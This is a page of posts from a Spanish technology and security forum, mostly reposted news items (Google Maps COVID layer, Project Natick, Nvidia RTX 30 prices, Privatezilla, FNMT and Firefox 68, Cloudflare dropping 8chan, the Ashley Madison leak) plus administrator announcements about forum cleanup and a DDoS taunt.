En los inicios, Google Maps te permitía ver el mapa en modo estándar o con vista de satélite, pero con el tiempo han ido creciendo nuevas capas que pueden añadir información adicional sobre el mapa, como el trasporte público o la información del tráfico. La última en incorporarse a la mezcla es la capa de Datos de COVID-19, que ha empezado ahora a activarse a la mayoría de usuarios.

El modo de acceder a esta capa es igual al del resto: tocando en el icono de las capas (el icono con un cuadrado justo encima de la brújula), eligiendo Datos de COVID-19. Cuando lo haces, se muestra una ventana de información donde se indican las fuentes de los datos y cómo interpretarlos.



Tras cerrar la ventana, ya podrás empezar a ver la información, aunque ten en cuenta que necesitas alejar el mapa para que se aplique el esquema de colores y se muestre la información superpuesta al lado del nombre de cada región.

Por ahora, esta capa muestra únicamente dos datos: el número de casos nuevos en los últimos siete días por cada 100.000 habitantes y la tendencia, indicando si es al alza o a la baja. Los datos que se muestran se corresponden con la media de los últimos siete días.



Fuente:
https://www.xatakamovil.com/aplicaciones/google-maps-muestra-capa-covid-19-informacion-casos-nuevos-regiones
#60


En junio de 2018 Microsoft anunció uno de sus proyectos más curiosos: Project Natick. La idea era sumergir un centro de datos con 864 servidores en el fondo del océano para ver si es más fácil mantenerlo ahí que en la superficie, donde había un homólogo. Dos años después lo han sacado de nuevo a superficie una vez el experimento ha finalizado. Y parece ser que ha sido todo un éxito: el centro de datos de debajo del agua solamente sufrió una octava parte de fallos con respecto al que se encontraba en tierra firme.


[youtube=640,360]https://youtu.be/lBeepqQBpvU[/youtube]

El centro de datos sumergido bajo el agua, Microsoft ha anunciado que finalmente lo han sacado de nuevo a la superficie. El centro de datos ha estado sumergido a unos 35 metros de profundidad en el el océano durante aproximadamente dos años

El equipo de Microsoft detrás del proyecto planteó la posibilidad de que debajo del agua un centro de datos sería más estable y energéticamente eficiente. Es decir, un centro de datos en tierra está expuesto a muchos más factores externos de los que se pueden dar en el fondo del mar. Por lo tanto, en principio se requiere más mantenimiento y consumo de recursos para ellos. El experimento viene a confirmar en cierto sentido esto. Microsoft al mismo tiempo que sumergió este centro de datos debajo del agua puso en marca otro prácticamente idéntico en condiciones en la superficie. Ahora han sacado comparativas.



Fuentes:
https://www.xataka.com/otros/microsoft-sumergio-centro-datos-fondo-oceanico-dos-anos-dicen-que-fallo-solo-octava-parte-que-uno-tierra
#61
 Nvidia ha publicado las tarifas oficiales para España correspondientes a las tarjetas Founders Edition. Son las siguientes:



   GeForce RTX 3070: 519 euros  estará disponible en octubre.
   GeForce RTX 3080: 719 euros estará disponible el 17 de septiembre.
   GeForce RTX 3090: 1.549 euros estará disponible el 24 de septiembre.









Hace aproximadamente dos años Nvidia marcó un punto y aparte con el lanzamiento de la gama GeForce RTX, una familia de tarjetas que tenía el honor de ser la primera en acercar la tecnología de trazado de rayos al mercado de consumo. Hoy el equipo verde presenta su segunda generación, compuesta por las RTX 3070, 3080 y 3090. Ninguna de ellas trata de redescubrir la rueda, pero su arquitectura Ampere promete en palabras de Nvidia "el mayor salto generacional de una GPU" en la historia de la casa.

De acuerdo con la literatura oficial, las nuevas GeForce RTX 30 han sido rediseñadas a un nivel extraordinariamente granular. Los núcleos de procesamiento de ray tracing (RT cores), los núcleos Tensor para IA y los procesadores de streaming son nuevos, y si bien la ganancia en prestaciones brutas debería ser notable, es precisamente el trabajo realizado en los RT cores los que permitirán que, ahora sí, el uso de ray tracing a alta resolución deje de ser una quimera.

De forma pormenorizada, Nvidia asegura que el rendimiento de su procesamiento de shaders es 2,7 veces superior al de Turing, los núcleos RT mejoran lo presente en 1,7 veces y la potencia de los núcleos Tensor (muy involucrados en el trabajo DLSS) casi triplica la original. En suma, y usando el proceso de 8 nm desarrollado por Samsung, Ampere proporciona 1,9 veces más prestaciones por vatio que Turing.

Por si fuera poco, el uso de PCIe 4.0 permite que las tarjetas puedan realizar labores de descompresión vía DirectStorage en la propia GPU, una función para la que Nvidia ha trabajado con Microsoft con el propósito de descargar la GPU. Esta característica se explotará en equipos con unidades SSD NVMe.

Habrá que estar muy atentos a los benchmarks no oficiales, porque estaríamos hablando de una mejora que superaría de forma muy drástica el habitual incremento intergeneracional de entre el 20 % y el 30 %.

Fuente:
https://www.elotrolado.net/noticias/tecnologia/nvidia-geforce-rtx-3070-3080-3090-precios-detalles
#62


https://github.com/builtbybel/privatezilla

Privatezilla es una herramienta gratuita y de código abierto destinada a administrar la privacidad en Windows 10, un punto polémico desde el lanzamiento del sistema operativo.



Privatezilla una aplicación de pequeño tamaño (295KB), gratuita y que no necesita ni instalación ya que se entrega como una portable. El nombre te sonará porque está inspirado en otras aplicaciones de código abierto como el navegador Mozilla, FileZilla y Clonezilla.


Privatezilla permite actuar sobre unas 60 configuraciones diferentes, incluyendo también apartados contra el Bloatware.


CitarFor advanced users only!

The community package for Privatezilla adds support for several advanced scripting features based upon PowerShell, e.g.

    Removal of specific pre-installed apps
    Uninstall of OneDrive
    Unping Startmenu tiles
    Disable telemetry of third-party apps (E.g. CCleaner, Firefox, Dropbox, Microsoft Office)
    Removal of Windows Defender (NOT recommended! I can highly recommend using Windows Defender on consumer versions of Windows 10)
    Blocking telemetry via firewall and host files. Rules are provided by crazy-max/WindowsSpyBlocker
    Support for all-in-one PowerShell debloating script Windows10Debloater.ps1
    New automation templates

Fuente:
https://www.muyseguridad.net/2020/08/28/privatezilla-windows-10-privado/
#63
El mensaje del terror: "Navegador no soportado"



Los usuarios que hayan intentado sacar un nuevo certificado digital para sus gestiones y trámites en la administración pública española se enfrentan desde hace años a problemas en el ámbito del soporte de navegadores y sistemas operativos.

La solución durante mucho tiempo ha sido instalar Firefox 68 (o solicitar el certificado a través del DNIe)   :-\  :-\  :-\

Fábrica Nacional de Moneda y Timbre (FNMT) recomienda instalar Firefox 68

la FNMT, este organismo cuenta con 9 millones de usuarios y emiten más de 10.000 certificados al día, l

https://www.sede.fnmt.gob.es/preguntas-frecuentes/acerca-de-mozilla-firefox/-/asset_publisher/fVZppcBHj0oa/content/1716-como-instalar-mozilla-firefox-68-si-tengo-instalada-la-version-69-?inheritRedirect=false


la Fábrica Nacional de Moneda y Timbre (FNMT), la entidad que emite el certificado más usado, no soporta las nuevas versiones de Firefox, y obliga a instalar una antigua versión del navegador que lógicamente tiene el problema de que devuelve al navegador vulnerabilidades que ya habían sido corregidas.

La razón es sencilla: Firefox ha dejado de soportar desde la versión 69 (de septiembre de 2019) un elemento del estándar HTML llamado "keygen" que facilitaba la generación de claves. Los problemas, no obstante, terminarán pronto: la FNMT tendrá disponible una nueva herramienta este mismo mes de agosto.





Fuentes:
https://www.xataka.com/servicios/navegador-no-soportado-vuelva-a-version-68-firefox-pesadilla-soporte-navegador-administracion-publica
#64
El foro tenía  1,882,414 mensajes. Son 1 millón 800 mensajes, muchos de ellos muy nuy viejos.

No puede ser que en el foro haya mensajes del año 2003. Soy un nostálgico
así que algunos de los mensajes viejos no se han borrado, pero se han movido a subforos privados que habrá de papelera. Están, pero no visibles para los usuarios.

Me comprometo a eliminar hasta el 2010 y ya es mucho creo, dejar casi 10 años. Lo anterior es muy, muy obsoleto.

Estructura del foro

Habrá nuevos foros, nuevos subforos y nuevas categorías. Se avecinan grande cambios. Restructuración completa del foro para adaptarse a los nuevos tiempos, pero lo primero y primordial es una limpieza de mensajes.

Se ha creado nueva categoría Media (Multimedia). Antes estaban en la categoría "Informática".



Media


  • - Multimedia
    - Diseño Gráfico
    - Juegos y Consolas

He pasado a subforo el foro de Chats - IRC - Messenger, porque realmente es "legacy". Igual que Visual Basic subforo de .NET

Habrá muchos más cambios, ésto es sólo el principio. Faltan muchos lenguajes de programación actuales.


Limpieza de mensajes viejos
(muy viejos)

Ayer sábado 24 de abril fueron "podados" tres subforos

Purgados 3652 días (10 años aprox) casi todos los Foros.

Eliminados 20 mil mensajes del foro de Series de Peliculas. La mayoría de enlaces ya no debían ni funcionar.

Al mover los mensajes de Hacking Básico y Hacking Avanzado (más antiguos del año 2010) a un" foro de mensajes hacking viejos" no visible, se mandaron por e-mail notificaciones de "mensaje movido", creo que sólo a las personas que eran moderador de ése foro o que tenían marcado el seguimiento del mensaje y a mí por ser el administrador

Mensajes viejos Hacking
   18,556 temas    118,005 mensajes

Así que si notas que faltan mensajes en el contador, pues buena señal, quiere decir que eres un usuario antiguo del foro.



Limpieza de moderadores


Los moderadores o miembros del staff que han sido degradados por hacer años que no entran al foro y deseen volver a serlo o volver a participar, o simplemente ver el foro privado por nostalgia o por el motivo que sea, que me lo comuniquen por e-mail: el-brujo@elhacker.net

Gracias
#65
¿Hola?

Si quieres contestar, aquí me tienes.. ¿Qué problema tienes?

P.D: El mensaje es para la persona cobarde que ataca el foro y no da la cara. ¿NO te atreves?

Ahora /index.php?=qwertyuiopa1sdfghjklC3B1zxcvbnm
/index.php?=elbrujo
/index.php?=Gilipollas
/index.php?=ErrVhClaYeWjNckg
/index.php?=EjoNJIIrbNodsDTC
/index.php?=JYKdWtjVWjKKMuvR

Ya te cansarás...

Qué mal  :P Búscate una vida!

Lo digo porque estamos recibiendo un ataque DDoS, pero como podéis ver el foro funciona.....  ;-) :silbar: ;-) :silbar:
#66
La empresa Cloudfare ha anunciado que dejaría de proporcionar servicios CDN a esta página. El motivo: al atacante detenido por haber asesinado este sábado a 20 personas en un supermercado de El Paso (Texas, Estados Unidos) se le atribuye un mensaje publicado en el foro, avisando de sus intenciones y con contenido racista.

https://new.blog.cloudflare.com/terminating-service-for-8chan/



Tal y como explica el consejero delegado de Cloudfare en el comunicado, no se trata de un incidente aislado. Si se confirma la autoría, se trataría del tercer ataque similar en menos de cinco meses que se anuncia antes en el foro: lo hicieron los autores de los atentados a las mezquitas de Christchurch, en Nueva Zelanda, y a la sinagoga de Poway, en California.




¿Qué es 8chan?



8chan, también llamado Infinite chan, nació de una escisión de 4chan, foro conocido por ser uno de los orígenes de Anonymous (y también por permitir la publicación de contenidos polémicos).



Brennan creó 8chan en 2013 porque consideraba que 4chan era cada vez más autoritario y  borraba más actualizaciones de los miembros. Este nuevo foro tenía una sola regla, al menos según publicaba en su web: "No publiques, pidas ni enlaces ningún contenido que sea ilegal en Estados Unidos, y no crees hilos con el objetivo de publicar o difundir este contenido".


Como recoge The New York Times, desde entonces la web se convirtió en el refugio de quienes habían sido expulsados de otros sitios por compartir toda clase de teorías de la conspiración racistas y sexistas.


Al final llegaron también los terroristas a 8chan: en marzo de 2019, el autor del atentado en dos mezquitas de Nueva Zelanda publicó su manifiesto en el foro: 75 páginas en las que expresaba su odio a los inmigrantes y su admiración hacia los extremistas estadounidenses, al parecer ajeno a la contradicción de que los primeros europeos no llegaran a su país hasta el siglo XVI. Asesinó a 51 personas.


Cloudfare explica en su comunicado que "seguimos sintiéndonos increíblemente incómodos al jugar el papel de árbitros del contenido y no tenemos la intención de ejercerlo a menudo". La empresa cree que su trabajo es ofrecer hosting y que son los legisladores quienes han de establecer cuáles son los límites de la libertad de expresión.


"Toleramos a desgana contenido que creemos reprochable -asegura, en referencia directa a 8chan-, pero trazamos la línea roja en las plataformas que han demostrado que inspiran eventos trágicos de forma directa y que no respetan la ley por sistema".


Pero la empresa no es optimista y cita al respecto lo ocurrido con The Daily Stormer, una web estadounidense neonazi. Cloudfare también la expulsó hace dos años, pero no tardó en volver a estar online gracias a otro proveedor de servicios. Uno de sus titulares de hoy asegura que "América necesita segregación racial" para evitar los ataques de terroristas supremacistas.

https://new.blog.cloudflare.com/why-we-terminated-daily-stormer/


Some of you might've read the @Cloudflare news already. They're dropping 8chan. https://t.co/FQJrv9wzvn

There might be some downtime in the next 24-48 hours while we find a solution (that includes our email so timely compliance with law enforcement requests may be affected).

— 8chan (8ch.net) (@infinitechan) August 5, 2019

https://twitter.com/infinitechan/status/1158207781427695616?ref_src=twsrc%5Etfw

Fuente:
https://verne.elpais.com/verne/2019/08/05/articulo/1564998761_611552.html
#67
Limpieza del foro

Acabo de hacer limpieza de muchos usuarios.

El foro tenía casi unos 400.000 usuarios registrados de los cuáles muchos con 0 mensajes.

Así que se han eliminado usuarios con 0 mensajes y más de 10 años inactivos y de los años 2003-2004-2005-2006

Es decir, Última vez activo 4.900 dias hasta 3.700 días....

No es un problema de espacio ya que hay casi 1 millón 800 mil mensajes, y hay  espacio de sobra, pero muchos usuarios son robots y al final uno ya no sabe qué nick escoger a la hora registrarse.

El próximo paso para registrarse será tener una invitación como en forocoches jaja, esto último es broma  :laugh:

También se han quitado varios reglas del WAF de CloudFlare que daban falsos positivos al intentar escibir un mensaje en el foro.

Y por último desde ayer se ha actualizado la base de datos de las IP's del Geolocalizador que eran datos del 2014 y ahora son de diciembre de 2016. Lo que hacía que muchas ip's no las localizara directamente al no saber dónde estaban ubicacadas. Ahora parece que funciona bastante mejor:

http://www.elhacker.net/geolocalizacion.html

De hecho la base de datos de ahora tiene el doble de peso, es el doble de grande de tamaño, antes unos 30MB y ahora 60MB
#68
La capacidad al comprar un móvil es muy inferior a la anunciada. Desde OCU, y a través de la campaña NoMeToquesLosGigas, iniciamos acciones judiciales contra los principales fabricantes. BQ es la primera empresa que se compromete a incluir la memoria de almacenamiento libre.

Los terminales llevan aplicaciones de serie no solicitadas por los consumidores, que no pueden ser suprimidas y que a veces se actualizan restando espacio al dispositivo. Después de comprobar, mediante pruebas de laboratorio, que la capacidad de almacenamiento interno disponible era muy diferente de la anunciada como capacidad total, el pasado 9 de diciembre OCU inició acciones judiciales contra los principales fabricantes de teléfonos móviles.

Movilízate para que no te toquen los gigas
http://www.ocu.org/movilizate/no-tocar-gigas

La diferencia de capacidad varía mucho de unos fabricantes a otros y, dependiendo del modelo, la memoria interna libre podía reducirse al 22% en el caso de los teléfonos con menos de 8 GB (lo que los hacía prácticamente inutilizables una vez instaladas unas pocas aplicaciones) o al 30% en el de los de 8 GB. Por estos motivos y a partir de ahora, la compañía BQ indicará en el embalaje de todos sus smartphones, además de los gigas de la memoria interna, la capacidad de almacenamiento que está libre para el usuario.

Calcula la capacidad de tu móvil y recupera tu memoria

OCU considera que la falta de información sobre la capacidad real es muy perjudicial para el consumidor, que compra (y paga) un dispositivo con unas características que en realidad no tiene. Con el objetivo de denunciar este caso de publicidad engañosa pusimos en marcha la campaña NoMeToquesLosGigas y hemos mantenido reuniones con distintos fabricantes para que incluyan información real.

Si tú también estás harto de que te toquen los Gigas sin que lo sepas, comprueba la capacidad real del almacenamiento de tu teléfono en la calculadora y súmate a nuestra iniciativa NoMeToquesLosGigas.


El BQ Aquaris X5 actualiza a Android Marshmallow 6.0.1


¡Por fin! Es lo que más de un usuario se le habrá pasado por la cabeza al leer el titular. Y es que BQ ha liberado la actualización de Android Marshmallow en su versión 6.0.1 para el BQ Aquaris X5.

La actualización que ha liberado BQ es la 4.0.0 que, entre otras mejoras, da el paso a Android Marshmallow y podrán descargarla todos los usuarios que tengan este terminal, vía OTA. Estas son las novedades más relevantes.

    Actualización a Android Marshmallow 6.0.1
        Mejora la estabilidad del dispositivo
        Mejora el rendimiento del dispositivo
        Incluye paquete de parches de seguridad de Mayo
    Nuevas BQ features:
        Ahora, para mejorar la privacidad, desde la pantalla de bloqueo no se tendrá acceso a los toggles de cobertura y modo avión.
        Con el dispositivo en reposo, con doble pulsación en botón power podrás acceder directamente a la cámara.
        Ahora el led de notificaciones se integra con el modo No Molestar de Marshmallow

Esta actualización es totalmente oficial, la noticia ha sido publicada en el foro de BQ, mibqyyo.

Muchos opinan que ha tardado mucho en ver la luz, y más los usuarios de los BQ M5 y M5.5 que aún tendrán que esperar unos días para recibir la actualización, pero hay que tener en cuenta que optimizar un sistema como Android, no es moco de pavo. Sino, solo hay que ver como los BQ E5 FHD y E6 no han podido actualizar a Android Marshmallow de manera oficial debido a las trabas que puso Mediatek a la hora de facilitar los drivers necesarios.

Fuentes:
http://www.ocu.org/tecnologia/telefono/noticias/memoria-libre-bq
http://billionbytes.es/bq-aquaris-x5-actualiza-android-marshmallow-6-0-1-20544
#69
De momento dejamos que wolfbcn, sea el único reportero oficial de elhacker.net, de manera que sea sólo el y otros miembros del staff (moderadores, colaboradores, moderadores, etc) los que puedan publicar noticias.

No es la primera vez que se publican noticias repetidas... o noticias que no tienen nada que ver con la informática, seguridad, etc. Además parte de las noticias, así como todas las entradas del blog se publican directamente en la cuenta twitter de elhacker.net.

https://twitter.com/elhackernet

Si se pueden responder y comentar las noticias como hasta ahora.

Por lo tanto los temas de noticias "relacionadas" se pueden publicar en otro foo, como es el Foro Libre, si se desea aportar se puede seguir haciendo.
#71
Noticias / uTorrent podría llegar a ser de pago
27 Agosto 2015, 18:11 PM
El conocido cliente torrent no está contento con los ingresos que reporta el modelo de anuncios que incorpora, un motivo que ha llevado a sus responsables barajar otras opciones.

http://forum.utorrent.com/topic/101314-utorrent-looking-forward/

Precisamente ese ansia de conseguir más ingresos llevó a uTorrent a implementar software que minaba Bitcoin sin el permiso del usuario, generando una fuerte polémica que afectó negativamente a su imagen.

De momento no tienen nada claro, pero están considerando opciones de suscripción que podría recoger periodos mensuales y anuales, o incluso vitalicios.

¿Pagarían los usuarios por uTorrent? Esa es la pregunta que deberían hacerse antes de decidir nada.



Fuente:
http://www.noticias3d.com/noticia.asp?idnoticia=65654
#72
Google habría decidido reducir las aplicaciones de instalación obligatoria que incluye su pack para Android, una medida que la compañía ya puso en práctica en otra ocasión.

Ahora las aplicaciones que habrían dejado de ser obligatorias serían Google Play Games, Google Play Books, Google+ y Google Kiosco.

Esta medida empezaría a ser efectiva muy pronto y la veríamos en terminales nuevos. Todos aquellos que quieran utilizarlas podrán descargarlas de la tienda de aplicaciones.




Fuentes:
http://news.softpedia.com/news/google-relaxes-android-guidelines-for-smartphone-makers-requires-less-bloatware-installed-489887.shtml


Vía:
http://www.noticias3d.com/noticia.asp?idnoticia=65637
#73
Google hace Open Source la herramienta BinNavi, el IDE para análisis de binarios que pertenecía a la empresa Zynamics, adquirida hace años por el gigante de Internet.

https://github.com/google/binnavi

Citar
BinNavi is a binary analysis IDE that allows to inspect, navigate, edit and annotate control flow graphs and call graphs of disassembled code.
http://www.zynamics.com/binnavi.html

Citar
Use Cases

    Do control flow based code analysis of disassembled x86, ARM, MIPS, and PowerPC code
    Cut down on complexity by removing unimportant code from functions
    Use powerful remote debuggers to debug programs on different operating systems
    Use Differential Debugging to quickly locate relevant code
    Create and assign user-defined tags to mark important functions and basic blocks
    Use advanced code analysis algorithms to keep track of data and code
    Manage all your reverse engineering projects in one central database
    Write scripts and plugins to extend BinNavi to meet your specific goals
    Rename and annotate variables and functions to make them self-explanatory
    Use the REIL meta-language to write platform-independent program analysis code











Fuente:
http://www.securitybydefault.com/2015/08/enlaces-de-la-secmana-290.html
#74


Según se ha publicado en http://ioshacker.com/news/icloud-details-of-220000-jailbreak-users-have-leaked-according-to-a-chinese-website

Hay una base de datos con información y detalles de 220.000 cuentas de Apple iCloud de terminales iPhone & iPad que tienen realizado el jailbreak. Según parece, estos datos pueden haber sido robados por tweaks maliciosos que vendrían con backdoors. Las especulaciones apuntan a servidores con copias piratas de tweaks populares de pago que pudieran haber sido infectadas para robar los datos de las víctimas, por lo que si es uno de tus casos, deberías revisar cuanto antes los tweaks de tu terminal y cambiar toda la información de seguridad de tu cuenta Apple iCloud.

La base de datos se encuentra a la venta en un servidor en China, y las intenciones al comprar esta base de datos pueden ser muchas, desde crear una botnet, hasta robar los datos almacenados en los backups de iCloud y poder hacer dinero con la información allí encontrada.


Fuente:
http://www.seguridadapple.com/2015/08/220000-usuarios-de-icloud-robados-de.html
#75
Según los datos filtrados de la página Ashley Madison, la empresa contaba en España con más de un millón de usuarios registrados. Más del 90% eran hombres

asi una semana después de la filtración de los datos personales de 36 millones de usuarios de la web para infieles Ashley Madison, las repercusiones del ataque parecen no tener fin. Para la empresa y para los usuarios. La primera se enfrenta ya a una demanda millonaria (578 millones de dólares) en Canadá y los segundos, a un escarnio público que en algunos casos ya ha conducido al suicidio. En España, según los datos filtrados, se calcula que Ashley Madison contaba con más de un millón de personas registradas. Pero, ¿cuál es exactamente el perfil de los adúlteros (y adúlteras) en nuestro país?

El retrato robot del usuario de Ashley Madison en España es el de un hombre de 37 años, residente principalmente en alguna de las grandes capitales de provincia del país, con un peso promedio de 73,9 kilos y una altura de 1,75 metros. Es lo que se desprende del análisis de los datos que El Confidencial ha extraído y analizado, con la colaboración de Tecnilógica, de los casi 10GB iniciales filtrados. Estos contienen todo tipo de información personal de los clientes de la página: nombre, apellidos, email, dirección IP (con la que, entre otras cosas, es posible descubrir su domicilio), perfiles, descripciones que utilizaban en la web... Una mina sociológica sobre el engaño y la infidelidad a disposición de cualquiera que quiera analizarla y destriparla.




Autor
Manuel Ángel Méndez
Email
@m_angelmendez
ElConfidencial.LAB
Email
Fecha25.08.2015 – 05:00 H.
Tags

    Ashley MadisonInternetCitas online

Casi una semana después de la filtración de los datos personales de 36 millones de usuarios de la web para infieles Ashley Madison, las repercusiones del ataque parecen no tener fin. Para la empresa y para los usuarios. La primera se enfrenta ya a una demanda millonaria (578 millones de dólares) en Canadá y los segundos, a un escarnio público que en algunos casos ya ha conducido al suicidio. En España, según los datos filtrados, se calcula que Ashley Madison contaba con más de un millón de personas registradas. Pero, ¿cuál es exactamente el perfil de los adúlteros (y adúlteras) en nuestro país?

El retrato robot del usuario de Ashley Madison en España es el de un hombre de 37 años, residente principalmente en alguna de las grandes capitales de provincia del país, con un peso promedio de 73,9 kilos y una altura de 1,75 metros. Es lo que se desprende del análisis de los datos que El Confidencial ha extraído y analizado, con la colaboración de Tecnilógica, de los casi 10GB iniciales filtrados. Estos contienen todo tipo de información personal de los clientes de la página: nombre, apellidos, email, dirección IP (con la que, entre otras cosas, es posible descubrir su domicilio), perfiles, descripciones que utilizaban en la web... Una mina sociológica sobre el engaño y la infidelidad a disposición de cualquiera que quiera analizarla y destriparla.

El top-10 de la infidelidad en España

Madrid, Barcelona, Valencia, Sevilla y Zaragoza son las cinco primeras ciudades por número de usuarios dados de alta en Ashley Madison. Un dato lógico, al tratarse de las ciudades más pobladas. Sin embargo, el 'top' es otro si se toma en consideración la población. El mayor ratio de usuarios por cada 10.000 habitantes se encuentra en Manises (en Valencia, 526 usuarios por 10.000 habitantes), seguido de Girona, Granada, Barcelona, Madrid, Santiago de Compostela, Alconbendas, Granollers, León y Sevilla (358 usuarios por 10.000 habitantes). Es el top-10 de la infidelidad en España.

Autor
Manuel Ángel Méndez
Email
@m_angelmendez
ElConfidencial.LAB
Email
Fecha25.08.2015 – 05:00 H.
Tags

    Ashley MadisonInternetCitas online

Casi una semana después de la filtración de los datos personales de 36 millones de usuarios de la web para infieles Ashley Madison, las repercusiones del ataque parecen no tener fin. Para la empresa y para los usuarios. La primera se enfrenta ya a una demanda millonaria (578 millones de dólares) en Canadá y los segundos, a un escarnio público que en algunos casos ya ha conducido al suicidio. En España, según los datos filtrados, se calcula que Ashley Madison contaba con más de un millón de personas registradas. Pero, ¿cuál es exactamente el perfil de los adúlteros (y adúlteras) en nuestro país?

El retrato robot del usuario de Ashley Madison en España es el de un hombre de 37 años, residente principalmente en alguna de las grandes capitales de provincia del país, con un peso promedio de 73,9 kilos y una altura de 1,75 metros. Es lo que se desprende del análisis de los datos que El Confidencial ha extraído y analizado, con la colaboración de Tecnilógica, de los casi 10GB iniciales filtrados. Estos contienen todo tipo de información personal de los clientes de la página: nombre, apellidos, email, dirección IP (con la que, entre otras cosas, es posible descubrir su domicilio), perfiles, descripciones que utilizaban en la web... Una mina sociológica sobre el engaño y la infidelidad a disposición de cualquiera que quiera analizarla y destriparla.

El top-10 de la infidelidad en España

Madrid, Barcelona, Valencia, Sevilla y Zaragoza son las cinco primeras ciudades por número de usuarios dados de alta en Ashley Madison. Un dato lógico, al tratarse de las ciudades más pobladas. Sin embargo, el 'top' es otro si se toma en consideración la población. El mayor ratio de usuarios por cada 10.000 habitantes se encuentra en Manises (en Valencia, 526 usuarios por 10.000 habitantes), seguido de Girona, Granada, Barcelona, Madrid, Santiago de Compostela, Alconbendas, Granollers, León y Sevilla (358 usuarios por 10.000 habitantes). Es el top-10 de la infidelidad en España.

Del total de 1.057.000 usuarios registrados en España, la inmensa mayoría son hombres: el 91%. Sin embargo, entre el 9% restante correspondiente a nombres de usuario de mujeres, un buen porcentaje corresponde en realidad a hombres con nombres falsos. Teknautas ha contactado con uno de los usuarios dado de alta bajo el nombre de "Nayara", con una dirección de email asociada a ese mismo nombre. La respuesta que recibimos desde otra dirección de email correspondía a un tal "Javier M.", que, además, pedía una recompensa económica por hablar del caso.



¿Cuánto gastaban los usuarios en Ashley Madison?

Otro de los datos interesantes es el perfil de gasto y número de transacciones. Avid Life Media, la empresa dueña de Ashley Madison, lanzó la web en el 2001, pero fue solo años después, empujada por una fuerte inversión en marketing, cuando la página despegó en número de usuarios y transacciones a nivel mundial. En España ese despegue se produjo a partir de septiembre de 2013, dos años después de su lanzamiento oficial. Ese mes la página registró 179 transacciones de pago; un año más tarde, en septiembre de 2014, registró 1.425 transacciones. Su máximo llegó el pasado mayo, con más de 2.800 transacciones.

Autor
Manuel Ángel Méndez
Email
@m_angelmendez
ElConfidencial.LAB
Email
Fecha25.08.2015 – 05:00 H.
Tags

    Ashley MadisonInternetCitas online

Casi una semana después de la filtración de los datos personales de 36 millones de usuarios de la web para infieles Ashley Madison, las repercusiones del ataque parecen no tener fin. Para la empresa y para los usuarios. La primera se enfrenta ya a una demanda millonaria (578 millones de dólares) en Canadá y los segundos, a un escarnio público que en algunos casos ya ha conducido al suicidio. En España, según los datos filtrados, se calcula que Ashley Madison contaba con más de un millón de personas registradas. Pero, ¿cuál es exactamente el perfil de los adúlteros (y adúlteras) en nuestro país?

El retrato robot del usuario de Ashley Madison en España es el de un hombre de 37 años, residente principalmente en alguna de las grandes capitales de provincia del país, con un peso promedio de 73,9 kilos y una altura de 1,75 metros. Es lo que se desprende del análisis de los datos que El Confidencial ha extraído y analizado, con la colaboración de Tecnilógica, de los casi 10GB iniciales filtrados. Estos contienen todo tipo de información personal de los clientes de la página: nombre, apellidos, email, dirección IP (con la que, entre otras cosas, es posible descubrir su domicilio), perfiles, descripciones que utilizaban en la web... Una mina sociológica sobre el engaño y la infidelidad a disposición de cualquiera que quiera analizarla y destriparla.

El top-10 de la infidelidad en España

Madrid, Barcelona, Valencia, Sevilla y Zaragoza son las cinco primeras ciudades por número de usuarios dados de alta en Ashley Madison. Un dato lógico, al tratarse de las ciudades más pobladas. Sin embargo, el 'top' es otro si se toma en consideración la población. El mayor ratio de usuarios por cada 10.000 habitantes se encuentra en Manises (en Valencia, 526 usuarios por 10.000 habitantes), seguido de Girona, Granada, Barcelona, Madrid, Santiago de Compostela, Alconbendas, Granollers, León y Sevilla (358 usuarios por 10.000 habitantes). Es el top-10 de la infidelidad en España.

Del total de 1.057.000 usuarios registrados en España, la inmensa mayoría son hombres: el 91%. Sin embargo, entre el 9% restante correspondiente a nombres de usuario de mujeres, un buen porcentaje corresponde en realidad a hombres con nombres falsos. Teknautas ha contactado con uno de los usuarios dado de alta bajo el nombre de "Nayara", con una dirección de email asociada a ese mismo nombre. La respuesta que recibimos desde otra dirección de email correspondía a un tal "Javier M.", que, además, pedía una recompensa económica por hablar del caso.





¿Cuánto gastaban los usuarios en Ashley Madison?

Otro de los datos interesantes es el perfil de gasto y número de transacciones. Avid Life Media, la empresa dueña de Ashley Madison, lanzó la web en el 2001, pero fue solo años después, empujada por una fuerte inversión en marketing, cuando la página despegó en número de usuarios y transacciones a nivel mundial. En España ese despegue se produjo a partir de septiembre de 2013, dos años después de su lanzamiento oficial. Ese mes la página registró 179 transacciones de pago; un año más tarde, en septiembre de 2014, registró 1.425 transacciones. Su máximo llegó el pasado mayo, con más de 2.800 transacciones.

¿Cuánto gastaba cada usuario en España? Un análisis de los datos revela un gasto medio 53 euros por usuario al mes.

Es importante tener en cuenta que darse de alta y navegar por algunas de las funciones de la página era gratis. Solo cuando querías ponerte en contacto con otros usuarios, chatear y ver fotos, tenías que pagar. Por tanto, es muy probable que un porcentaje muy pequeño del millón de usuarios registrados fuera realmente de pago.

Fuente:
http://www.elconfidencial.com/tecnologia/2015-08-25/asi-es-el-perfil-del-usuario-adultero-de-ashley-madison-en-espana_984652/
#76
Así lo asegura la empresa británica Intelligent Energy, quienes han creado el primer prototipo de batería de hidrógeno para un iPhone 6 "modificado". Lo conseguido significaría que los smartphones del futuro podrían sobrevivir toda una semana sin necesidad de carga.




http://www.telegraph.co.uk/finance/newsbysector/mediatechnologyandtelecoms/11818151/Revealed-the-first-hydrogen-powered-battery-that-will-charge-your-Apple-iPhone-for-a-week.html

Según explican, el hidrógeno y el oxígeno se combinan en una pila de combustible pequeña, un esfuerzo que lejos de parecer una utopía afirman que ya es posible y que lo han logrado con éxito. ¿Cómo? La clave es que, a diferencia de las pilas de litio actuales, la carga no es con electricidad, sino a través de una célula (o pila) de combustible delgada que utiliza hidrógeno como combustible.

Así, el prototipo de iPhone es prácticamente igual al que vemos hoy, sin modificación aparente, ya que la célula de combustible es del mismo tamaño que el chasis del iPhone 6, pero a la vez tan delgada que puede caber al lado de la batería convencional sin alteración alguna. La única diferencia es una pequeña hilera de orificios de ventilación traseras que permite el escape de vapor de agua en pequeñas cantidades.

Según el diario The Telegraph, que ha visto el proyecto en exclusiva, el cartucho de combustible es capaz de suministrar energía a la batería durante una semana de uso continuado, lo que a día de hoy sería un salto cualitativo de varias generaciones. Según Intelligent Energy:

CitarHasta donde sabemos, esto nunca se había hecho antes. Hemos logrado hacer una pila de combustible tan delgada que podemos encajarla en el chasis existente sin alteraciones y conectarla a la batería recargable.


De esta forma, el prototipo de iPhone 6 permite introducir el cartucho en un adaptador acoplado al conector de los auriculares, aunque también explican que en la versión final estos cartuchos con hidrógeno deberían poder introducirse de manera similar a las actuales tarjetas microSD en el teléfono, a través de un slot.

